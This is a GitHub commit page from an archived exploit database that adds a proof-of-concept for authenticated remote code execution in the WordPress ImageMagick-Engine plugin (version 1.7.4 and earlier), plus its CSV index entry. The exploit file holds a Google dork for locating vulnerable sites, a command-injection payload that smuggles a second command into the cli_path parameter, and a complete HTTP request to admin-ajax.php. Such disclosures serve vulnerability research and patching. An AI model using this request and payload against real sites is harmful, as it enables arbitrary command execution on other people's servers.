Skip to content
This repository was archived by the owner on Nov 28, 2022. It is now read-only.

Commit b4e29f1

Browse files
author
Offensive Security
committed
DB: 2022-10-18
1 changes to exploits/shellcodes Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)
1 parent 4d6a64e commit b4e29f1

File tree

2 files changed

+34
-0
lines changed

2 files changed

+34
-0
lines changed

exploits/php/webapps/51025.txt

Lines changed: 33 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,33 @@
1+
# Exploit Title: Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)
2+
# Google Dork: inurl:"/wp-content/plugins/imagemagick-engine/"
3+
# Date: Thursday, September 1, 2022
4+
# Exploit Author: ABDO10
5+
# Vendor Homepage: https://wordpress.org/plugins/imagemagick-engine/
6+
# Software Link: https://github.com/orangelabweb/imagemagick-engine/
7+
# Version: <= 1.7.4
8+
# Tested on: windows 10
9+
10+
-- vulnerable section
11+
https://github.com/orangelabweb/imagemagick-engine/commit/73c1d837e0a23870e99d5d1470bd328f8b2cbcd4#diff-83bcdfbbb7b8eaad54df4418757063ad8ce7f692f189fdce2f86b2fe0bcc0a4dR529
12+
13+
-- payload on windows: d&calc.exe&anything
14+
-- on unix : notify-send "done"
15+
-- exploit :
16+
17+
GET /wp/wordpress/wp-admin/admin-ajax.php?action=ime_test_im_path&cli_path=[payload]
18+
HTTP/1.1
19+
Host: localhost
20+
Cookie: wordpress_sec_xx=; wp-settings-time-1=;
21+
wordpress_test_cookie=; wordpress_logged_in_xx=somestuff
22+
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:104.0)
23+
Gecko/20100101 Firefox/104.0
24+
Accept: */*
25+
Accept-Language: en-US,en;q=0.5
26+
Accept-Encoding: gzip, deflate
27+
Referer: https://localhost/wp/wordpress/wp-admin/options-general.php?page=imagemagick-engine
28+
X-Requested-With: XMLHttpRequest
29+
Sec-Fetch-Dest: empty
30+
Sec-Fetch-Mode: cors
31+
Sec-Fetch-Site: same-origin
32+
Te: trailers
33+
Connection: close

files_exploits.csv

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -45086,3 +45086,4 @@ id,file,description,date,author,type,platform,port
4508645086
51022,exploits/php/webapps/51022.txt,"Aero CMS v0.0.1 - SQLi",1970-01-01,nu11secur1ty,webapps,php,
4508745087
51023,exploits/php/webapps/51023.txt,"Testa 3.5.1 Online Test Management System - Reflected Cross-Site Scripting (XSS)",1970-01-01,"Ashkan Moghaddas",webapps,php,
4508845088
51024,exploits/php/webapps/51024.txt,"Wordpress Plugin Zephyr Project Manager 3.2.42 - Multiple SQLi",1970-01-01,"Rizacan Tufan",webapps,php,
45089+
51025,exploits/php/webapps/51025.txt,"Wordpress Plugin ImageMagick-Engine 1.7.4 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,ABDO10,webapps,php,

0 commit comments

Comments
 (0)